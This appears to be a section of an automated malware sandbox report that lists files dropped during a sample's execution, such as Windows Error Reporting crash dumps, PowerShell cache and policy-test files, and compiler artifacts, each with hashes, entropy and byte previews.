                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.0.0.0.4.3.4.4.8.5.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.9.8.a.7.1.9.-.a.0.b.7.-.4.d.2.e.-.b.3.8.8.-.1.c.5.9.2.5.5.4.d.e.5.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.6.a.c.9.4.8.-.e.4.1.1.-.4.f.3.b.-.a.5.8.d.-.e.6.6.d.2.f.0.1.7.2.7.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.8.-.0.0.0.1.-.0.0.1.8.-.9.5.4.9.-.0.5.0.9.9.8.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8D1.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Fri Apr 22 22:26:45 2022, 0x1205a4 type
                                Category:dropped
                                Size (bytes):41334
                                Entropy (8bit):2.004648071633227
                                Encrypted:false
                                SSDEEP:192:A854coHsADYmaZyZOGKWtP75TTmlZRCXL5CpVfS:A4yshxbGttP75TinRCXFCS
                                MD5:045591FB9A51E43D170A2F09CC3DADC1
                                SHA1:81CF74B064211B7258D207E5E299206175584D6D
                                SHA-256:AC3064CB253A5F508A4883613F1FA63A694AE5572B5D22F80E4F38375E533FD2
                                SHA-512:D100B85B0237B4D327966B3F7B19E55FBAC7ABBA83C6C7D1262EF07F68D10B8E5D9B1E08B25C9EA5A31875E220DA022555AA87F0C4AB4126213DBAC6BA620449
                                Malicious:false
                                Preview:MDMP....... ........+cb........................4...........$................)..........`.......8...........T........... ...V............................................................................................U...........B..............GenuineIntelW...........T............+cb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE12.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8356
                                Entropy (8bit):3.6933010429084745
                                Encrypted:false
                                SSDEEP:192:Rrl7r3GLNitC66q06YpoSU5zgmflSQCpNP89b571fHTm:RrlsNio686YWSU5zgmflSu5Jfq
                                MD5:0DB5E90F9A50EBD43F3DF77C0DA85950
                                SHA1:B4EB81ABFEDA2C5FCF0A3F8D04F78B19BFB1BF70
                                SHA-256:833B8C530A023BD671DDD8012AA17D0C0F15F255008D3C946443CCE66ADC0BFF
                                SHA-512:3839036F675F9945C835F7E058C20ECF6191E7FC1A654899335ED4B3FC8D081556890C5509E7EFF953E743CA2975C1019517564FB3F9EE36432A362698E287C5
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.0.<./.P.i.d.>.......

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFA9.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4665
                                Entropy (8bit):4.431687079649683
                                Encrypted:false
                                SSDEEP:48:cvIwSD8zsIJgtWI92gWgc8sqYjhq8fm8M4J2+AFpdW+q8vQ+CKcQIcQw0ld:uITfOxZgrsqY1fJBKmKkw0ld
                                MD5:1DBFF782298A0B63A1CC9CDF1DF61976
                                SHA1:3024D4229EEE1DFBB8E000183F6CDFAC66732407
                                SHA-256:6BC464DB5E86A06C79A21B34035437175F2C1D128EE0DCE7DC01D45E2E1CD1D8
                                SHA-512:EF28376A35433F6278CA36321C4DA9F000AAC8DAB3BD9EA7A829D1B65F81BCCD88528442B9CDAD2EE707C5B2E44FF663A62C4BB249417C1686E9B1BC276F0FE4
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483657" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD53.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Fri Apr 22 22:26:50 2022, 0x1205a4 type
                                Category:dropped
                                Size (bytes):41134
                                Entropy (8bit):1.975058856907694
                                Encrypted:false
                                SSDEEP:192:+5mcXsADYmaM3IdOGKWhi075TTxZ6Tpdy2FjrFJDq:evshcGtQ075TH6Tpvq
                                MD5:2001588067FFF81F56C55A45CFC8D00C
                                SHA1:FCC83C72DF6A50E9E5A0B2EE60D4AF17CAFF3F79
                                SHA-256:6F54FE4171D5D68F0FBDCC4AAE1C49EA13E04D8A592EDDE299D97232536071EB
                                SHA-512:4F7C5711FC707A734BEE855473D6EABFEB555166F537BBEBFBDB7503BF8844E38A589AAE5BE29C9769DDD9181252F807FEEA58C56E5410AEF18287576118DE24
                                Malicious:false
                                Preview:MDMP....... ........+cb........................4...........$................)..........`.......8...........T........... ................................................................................................U...........B..............GenuineIntelW...........T............+cb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0A0.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8340
                                Entropy (8bit):3.69963560991601
                                Encrypted:false
                                SSDEEP:192:Rrl7r3GLNit06nfq06YprSUYWgmfcSQCprk89bFzsfsXm:RrlsNie6x6YFSUYWgmfcSZFYfB
                                MD5:516269548DB5CE174DADC69DEBA1EB5C
                                SHA1:11FAF3721AA9894B5591B1BCE04F5F72D2DC8DE4
                                SHA-256:E9EF7AB53DF211C4A0A1D12C6E5A073BF1F9702B1A6EBE440E9C23BCA2565AC6
                                SHA-512:2139A4ED0CB86BAACA05655D9D074F36C99E7F75B523FDC9CFAE55742F13958D2D3E34A44D1FDF05764FA21ECCC19F08AAD006CC13DCBA4592C987D8E0E52604
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.0.<./.P.i.d.>.......

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERD237.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4598
                                Entropy (8bit):4.471806474905488
                                Encrypted:false
                                SSDEEP:48:cvIwSD8zsIJgtWI92gWgc8sqYjhF8fm8M4J2+hZFRb+q849krKcQIcQw0kd:uITfOxZgrsqY1yJbdbarKkw0kd
                                MD5:DED0973B6E25A0EFCBA8347616282B2D
                                SHA1:488F0BA05EEBD3FD6F3234A170074152C02906B3
                                SHA-256:358350ADB96A3F7620569B6C9551773225FC09060ED4C99FFC5F3E2BC6FF9AC3
                                SHA-512:2103F5C5D1021053BB37E577665D57B4961B33881BBC084F2E881C358AEF87395A55FCDE151E785922BE39066AE97A0A5E29EEC3B9BFF88F9F2A5127972B76A5
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483657" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2CD.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 15 streams, Fri Apr 22 22:26:59 2022, 0x1205a4 type
                                Category:dropped
                                Size (bytes):54158
                                Entropy (8bit):2.188437702004145
                                Encrypted:false
                                SSDEEP:192:v5FcMhsADYmaNnOGKWSV+hHTpg0DAKwZhbvB5isF7h75TT+nZPnnTlODfE9zsQ:xxsh4GtjhjAKwZhbziwV75TaZPnhsQ
                                MD5:8C90697300310A9955BFECD8FBE19128
                                SHA1:89ECCBCAF68529209F03D80BB216F6AB2E42020D
                                SHA-256:B47100BC6B1B609C64B3ACE915F911B109B86CE453B7A16B0884763B01B5ADB8
                                SHA-512:AAEFEB710D9ACD68122BD0844F854B9B77E00618ED321759257D2228C7F648D9065E131F4259E3D78F9B4604A7B8A0F5D0AF50615F45747E1BC68045E50655AB
                                Malicious:false
                                Preview:MDMP....... ........+cb........................4...........$................)..........`.......8...........T............................................................................................................U...........B..............GenuineIntelW...........T............+cb.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERF629.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8294
                                Entropy (8bit):3.696774268699421
                                Encrypted:false
                                SSDEEP:192:Rrl7r3GLNitQ67q06YpbSUGmgmfqSJ7CpD989bFLzsf8fzm:RrlsNia616Y1SUGmgmfqSJxFLYfMq
                                MD5:62B8619A4E1DEEB3CFE96784DC7BCE24
                                SHA1:7B61FB3B1F695606412A6DA9E26671521D321E0D
                                SHA-256:A5988942CA222FF850B4FFBEA7BE18868602C422ABFCA475C81EBAAC33718685
                                SHA-512:AA5091E3E6A2D713E1D0C0473B38220990ED51190061251FE44C791EF70FA8189FEF2F119990E92C5B49CC59F0138587FBD48A22D4A21AD8B48A99BABEDD6D7D
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.0.<./.P.i.d.>.......

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERF7B1.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4564
                                Entropy (8bit):4.4450578324351975
                                Encrypted:false
                                SSDEEP:48:cvIwSD8zsIJgtWI92gWgc8sqYjhj8fm8M4J2+bF4+q84CPKcQIcQw0kd:uITfOxZgrsqY1gJocKkw0kd
                                MD5:94F0237F61D6A72BF9FD262D5DAF1CB8
                                SHA1:77BA53C28A3D168D892F2D06300803EC5CF62C34
                                SHA-256:0A82D2F9FA529CEBB573FD7A8D54A1EE0C689179A013A2B1AA5C3F6E7F333A79
                                SHA-512:D3F0BD47566C109A1DC34A0128DDBD00B4C61C99A3DAD26A29CD182AACA889854305F960FF503BCA681E097273D18372BCE4D380B2F3ED718C0AAFD1D207EBE5
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1483657" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11606
                                Entropy (8bit):4.883977562702998
                                Encrypted:false
                                SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                                MD5:243581397F734487BD471C04FB57EA44
                                SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                                SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                                SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                                Malicious:false
                                Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.9260988789684415
                                Encrypted:false
                                SSDEEP:3:Nlllulb/lj:NllUb/l
                                MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                Malicious:false
                                Preview:@...e................................................@..........

                                C:\Users\user\AppData\Local\Temp\RESD841.tmp

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                                Category:modified
                                Size (bytes):1336
                                Entropy (8bit):4.0070959147380645
                                Encrypted:false
                                SSDEEP:24:HJm9ZLo1c8ZH+hKdNwI+ycuZhNwakScPNnq9Sd:uSrZ0Kdm1ulwa3Mq9C
                                MD5:0207AEB635BFA2BFB793AA26D45D28BC
                                SHA1:EFC69E173AB42B6B1AF939C8BE54DC73301AC851
                                SHA-256:C94D40766F2B91F22AD5E55BA35D947AE2825F5B9A34E0ECE134B0A86ECCE5AF
                                SHA-512:B11F2E0DFE55984263E6BA60EE1B95E6D07588F64435CD4EF2D972A41819E37AB5DCBE268671C67D7D4ADDC6EEF99FC31CE1162BFAD35D68B71E8F3400B45777
                                Malicious:false
                                Preview:L....+cb.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........X....c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP...................R./;....W..x..........7.......C:\Users\user~1\AppData\Local\Temp\RESD841.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.k.b.u.g.t.x.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                C:\Users\user\AppData\Local\Temp\RESED31.tmp

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                                Category:modified
                                Size (bytes):1336
                                Entropy (8bit):4.01926801632089
                                Encrypted:false
                                SSDEEP:24:Hbm9ZM+IZHUhKdNwI+ycuZhNUsvakSfsIPNnq9Sd:QeZGKdm1ul/a3jq9C
                                MD5:79C2F50A254E8807286FA0F3634DCDAA
                                SHA1:3ED67CB1DE55A3B1B93CBD8510385B9608F4F624
                                SHA-256:983C6748597DC864F47D16C32EAAA59C226FBE8DF3ADCC37C48640A59BAD0C93
                                SHA-512:7AE7FA180A5A95550FD00DA6B9AF07FD777251B713683B66512C6DE624BB823C9B6D0A99DF8678A9006EE87B8C9244C974B945D135FA1433384649AB175836CF
                                Malicious:false
                                Preview:L....+cb.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........X....c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP...............=....:qT..y.}............7.......C:\Users\user~1\AppData\Local\Temp\RESED31.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.b.o.h.4.m.l.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itmkjels.31u.psm1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeni10bs.j5c.ps1

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1

                                C:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP

                                Download File
                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                File Type:MSVC .res
                                Category:dropped
                                Size (bytes):652
                                Entropy (8bit):3.087313141948283
                                Encrypted:false
                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryWlklqqak7YnqqFlklqbPN5Dlq5J:+RI+ycuZhNUsvakSfsIPNnqX
                                MD5:3D9C89F9813A7154E8FB79DA7D10E8B2
                                SHA1:4E2EA7F78C62941F644D9F1FAD64D127E31306CE
                                SHA-256:B76B5C81AFE17B214527AC8DCD85285CED0102DC6164A4304188B5D4D4E69239
                                SHA-512:72123D606437DA61F2D52D44E329F6CD0E9CB6CD86A3739436F54889D0972FBA14EFB814D244B2A2CEBA34730E6B2C15226A5403BE8C0F7886D396A3021FCA9F
                                Malicious:false
